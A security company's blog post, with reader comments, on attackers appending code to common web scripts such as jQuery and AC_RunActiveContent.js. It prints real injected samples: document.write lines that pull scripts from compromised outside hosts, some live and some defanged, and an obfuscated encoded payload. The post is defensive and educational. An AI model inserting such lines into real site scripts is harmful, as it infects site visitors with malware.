• When Benign scripts attack!

    Code injection attacks are constantly morphing. The bad guys are constantly looking to deposit malicious code into websites in order to infect visitors to these sites. Once the visitors are infected, their machines can become part of extremely large bot armies and can be used to propagate the cycle of code injection attacks further. This is usually done by sniffing the clear-text ftp user name and password that most people use to update their websites with new content.

    Traditionally hackers have always used obfuscated code, packed scripts and all sorts of techniques which would flummox the average joe. Now there is an increasing concentration on modifying or hacking scripts that pre-exist on websites.

    Most websites use scripts such as jquery.js and AC_RunActiveContent.js. These are prime candidates for getting hacked.

    What do these “benign” scripts do?

    JQuery (jquery.com) is a fast and concise JavaScript Library that simplifies HTML document traversing, event handling, animating, and Ajax interactions for rapid web development.

    JQuery provides a wrapper to the core applications of JavaScript (e.g. animation, AJAX, form validation) as straight-forward interfaces which can be employed in the rest of the code, providing a scripting layout that is faster, simpler and easier to use.

    When content developers want to  publish a Flash document associated with HTML using the “Flash Only” or “Flash HTTPS” HTML templates, a JavaScript file linked to the HTML file, named AC_RunActiveContent.js will automatically be created. This file will need to remain with the HTML file for the JavaScript-based active content embedding. A JavaScript function called AC_FL_RunContent() is used to dynamically generate the necessary object and embed tags necessary for the browser to display your Flash movie. This function is defined within AC_RunActiveContent.js and called in the location of your HTML file where you wish your Flash movie to be displayed.

    The Hacks

    Hackers have now started to focus more on these scripts by inserting code like the samples below.

    Owners of websites and content creators should be aware of these evolving threats and should be on their toes to deal with them. One way is to get sha1 and MD5 hashes for these benign scripts and compare them frequently. Consider this badwarebusters.com post, even until a few minutes ago there have been cases of similar hacks popping up. In this case also a benign script was compromised with nearly the same code as the one used for the jquery hack.

    Adios all, till the next in this vein of posts. And as usual, StopTheHacker is always here to help.

    Consider an example of AC_RunActiveContent.js being hacked:

      method.onMouseRight = function(event) {
        this.bubbleUp(event);
      }
    
    NOF.Flash.__proto__.ComponentsMouseListener = NOF_Flash_ComponentsMouseListener;
    }
    
    document.write('<script src=http://spielwaren-carl-loebner.de/shop/team.php ><\/script>');
    

    Now JQuery, consider code like the below, right on top of the main source.

    $a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14Z2529);Z2522;Z22;ceZ3dZ223hZ2561Z2572CodZ2565At
    (Z2530)^(Z25270Z2578Z25300Z2527+esZ2529));Z257d}Z22;cdZ3dZ22Z253dst+Z2553triZ256egZ252efZ2572Z256fmZ254
    3haZ2572CZ256fdeZ2528(Z2574mp.Z256Z22;czZ3dZ22Z2566uZ256ectZ2569onZ2520cZ257a(czZ2529Z257bretZ2575rZ256eZ
    2520ca+Z2563Z2562+cZ2563Z252bcZ2564+ceZ252bczZ253bZ257d;Z22;cbZ3dZ22pZ2565(Z2564s)Z253bstZ253dtmpZ253dZ25
    27Z2527;for(iZ253d0;iZ253cds.Z256cenZ22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dZ2573Z2574;Z2564cZ2573Z2528dZ2
    561Z252bdZ2562+Z2564cZ252bZ2564dZ252bdZ2565,Z2531Z2530)Z253bZ2564Z2577Z2528Z2573tZ2529;Z2573Z2574Z253dZ25
    24Z2561;Z2522;Z22;dzZ3dZ22Z2566unZ2563tioZ256e dZ2577(tZ2529Z257bcaZ253dZ2527Z252564oZ252563umeZ25256etZ2
    52ewZ252572Z252569Z252574Z2565Z252528Z252522Z2527;ceZ253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253cscrZ
    252
    
    (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=funct
    

    Add to this existence of tons of other scripts, live-clocks and the many more people get from dynamic drive and sites similar to it, the scale of this relatively “silent” attack vector is very large.

    And this time right after the body of the main code:

    var ret = handler.apply(this, arguments);
    
    if( ret !== undefined ) {
    	event.result = ret;
    	if ( ret === false ) {
    		event.preventDefault();
    
    document.write(sc ript src=hxxp://stroysauna.ru/da37d9e b94067800b6205421a826ccd0/links.php&gt;&lt;\/sc ript&gt;);
    document.write(s cript src=hxxp://stroysauna.ru/da37d9eb94067800b6205421a826ccd0/lin ks.php &gt;&lt;\/script&gt;');
    document.write(scr ipt src=hxxp://cafeimperio.ee/cache/INSTALL.php &gt;&lt;\/script&gt;');
    document.write(sc ript src=hxxp://cafeimperio.ee/cache/INSTALL.php &gt;&lt;\/script&gt;');
    document.write(sc ript src=hxxp://cafeimperio.ee/cache/INSTALL.php &gt;&lt;\/script&gt;');
    document.write(scri pt src=hxxp://cafeimperio.ee/cache/INSTALL.php &gt;&lt;\/script&gt;');
    document.write(scri pt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php &gt;&lt;\/scri pt&gt;');
    document.write(scr ipt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php &gt;&lt;\ / sc ript&gt;');
    document.write(sc ript src=hxxp://sportsdisplaycases.net/baseball/sitemap.php &gt;&lt;\/scri pt&gt;');
    document.write(scr ipt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php &gt;&lt;\/scr ipt&gt;');
    

    Here’s a really recent example:

    The malicious code present looks like below and is inserted at the end of the benign ac_runactivecontent.js script.

    default:
     ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
     }
     }
     ret.objAttrs["classid"] = classid;
     if (mimeType) ret.embedAttrs["type"] = mimeType;
     return ret;
    }
    
    document.write('<sc ript src=hxxp://tet asperu.pe/wordpress/video11.php ><\/script>');
    document.write('<scr ipt src=hxxp://sam poong.co.kr/admin/SMALL_UPDIR/index.php ><\/script>');
    document.write('<scri pt src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
    document.write('<sc rip t src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
    document.write('<scr ipt src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
    

    And if you haven’t had a fill of it yet… here’s more:

    this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||
    document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],
    document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],
    document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):
    this.css(J,typeof K==="string"?K:K+"px")}})})();
    
    document.write('<s c ript src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-fe rrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-fer rigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-ferr igno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-ferri gno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scrip t src=http://lou-ferrig no.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://l ou-ferrign o.info/.smileys/sinbad.php ><\/script>');
    document.write('<scr ipt src=http://lo u-ferrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<script src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<sc ript src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scrip t src=http://lou-f errigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-fe rrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scr ipt src=http://lou-fer rigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<sc ript src=http://lou-ferr igno.info/.smileys/sinbad.php ><\/script>');
    document.write('<s cript src=http://lou-ferri gno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scrip t src=http://lou-ferrig no.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-ferrign o.info/.smileys/sinbad.php ><\/script>');
    document.write('<scr ipt src=http://f ici.com/promotional-wall-calendars/cal1.php ><\/script>');
    document.write('<sc ript src=http://sc hitkomplekt.ru/price/index.php ><\/script>');
    document.write('<s cript src=http://fic i.com/promotional-wall-calendars/cal1.php ><\/script>');
    document.write('<scrip t src=http://fici .com/promotional-wall-calendars/cal1.php ><\/script>');
    document.write('<scri pt src=http://kalai kaviri-offcamp.com/images/gifimg.php ><\/script>');
    document.write('<scr ipt src=http://kolons port.com.cn/images/b54/gifimgz.php ><\/script>');
    document.write('<script src=http://brandper fumes.co.uk/tips_on_how_to_wear_your_perfume_correctly/require.php ><\/script>');
    document.write('<scri pt src=http://salgoo.c om/data/_tail.php ><\/script>');
    document.write('<scr ipt src=http://thecelebr itynetwork.netfirms.com/_vti_pvt/rwpzo.php ><\/script>');
    document.write('<sc ript src=http://thecelebri tynetwork.netfirms.com/_vti_pvt/rwpzo.php ><\/script>');
    
    • I may be missing something, but your article does not make it clear how the ‘payload link’ (ie hxxp://spielwaren-carl -loebne r.de/shop/team.php ) can be written into the source of the site, affecting ALL vistors to the site. I understan this is a ‘persistant’ xss attack (it has just happened to our site). Your example seems to cover only the hacker impacting on the hacker’s own security context.

      Posted by dave on November 2nd

    • You are right, this article does not focus on how the payload is injected. From my analysis of systems, the culprit is a relatively straightforward, but pervasive, trojan, which resides on the local machines used to make changes to web-pages. Once the cleartext ftp passwd and username is sniffed, this data can be pumped in without ringing any alarm bells.

      Posted by anirban on November 2nd

    • Thanks – I can confirm this is what seemed to happen in our case. The payload was uploaded to live from a developer’s PC.

      Posted by dave on November 3rd

    • my site is also injected like these scripts. but i am not able to resolve the issue. kindly, advice me what to do?

      Posted by Kumar Abhishek on February 9th

    • @Kumar Abhishek
      Kumar, why don’t you contact us via our support form and tell us more about your issue? One of our admins will be happy to help you.

      Posted by admin on February 9th

    • […] A more detailed description of how the malware is appended is presented in one of our previous posts. […]

      Posted by osCommerce Attacks – stopthehacker.com – Jaal, LLC on November 7th